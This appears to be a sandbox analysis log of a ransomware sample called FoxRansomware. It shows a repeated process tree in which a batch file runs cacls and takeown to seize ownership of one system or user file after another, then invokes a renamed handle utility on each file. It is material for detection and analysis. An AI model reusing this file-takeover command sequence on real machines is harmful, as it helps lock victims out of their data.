C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C3⤵PID:6588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"3⤵PID:5940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AD.bin" -nobanner3⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AD.bin" -nobanner4⤵PID:5976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""2⤵PID:2184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C3⤵PID:4848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"3⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AN.bin" -nobanner3⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AN.bin" -nobanner4⤵PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""2⤵PID:6284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C3⤵PID:6612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"3⤵
- Modifies file permissions
PID:5500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B3.bin" -nobanner3⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000B3.bin" -nobanner4⤵PID:7196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:4492
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:2636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:4076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "background.png" -nobanner3⤵PID:1008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "background.png" -nobanner4⤵PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:2776
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:6244
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:7436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:7296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:7248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl""2⤵PID:696
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" /E /G Admin:F /C3⤵PID:2320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl"3⤵PID:7864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" -nobanner3⤵PID:7664
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" -nobanner4⤵PID:7552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:7340
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:7792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:7796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:7884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:284
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:6084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:7984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:7896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:8076
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵
- Modifies file permissions
PID:8012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:8028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:8156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:6576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000004.bin" -nobanner3⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000004.bin" -nobanner4⤵PID:784
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:7612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵PID:7068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000H.bin" -nobanner3⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000H.bin" -nobanner4⤵PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:5900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:6860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵
- Modifies file permissions
PID:6752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000S.bin" -nobanner3⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000S.bin" -nobanner4⤵PID:6552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:6628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:6888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000016.bin" -nobanner3⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000016.bin" -nobanner4⤵PID:7000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:4312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:2408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000050.bin" -nobanner3⤵PID:4952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000050.bin" -nobanner4⤵PID:6484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl""2⤵PID:5692
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" /E /G Admin:F /C3⤵PID:7140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl"3⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner3⤵PID:6916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner4⤵PID:2932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""2⤵PID:7112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C3⤵PID:6132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"3⤵PID:4368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat.LOG1" -nobanner3⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "settings.dat.LOG1" -nobanner4⤵PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:7412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵PID:5384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:2560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:3332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "background.png" -nobanner3⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "background.png" -nobanner4⤵PID:6304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:7236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:2444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:6568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:6564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:6572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:4596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:5844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:5976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:6900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:5928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:5380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵
- Modifies file permissions
PID:7624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:1320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl""2⤵PID:6188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" /E /G Admin:F /C3⤵PID:6172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl"3⤵PID:6848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner3⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner4⤵PID:1448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5404
-
-
-
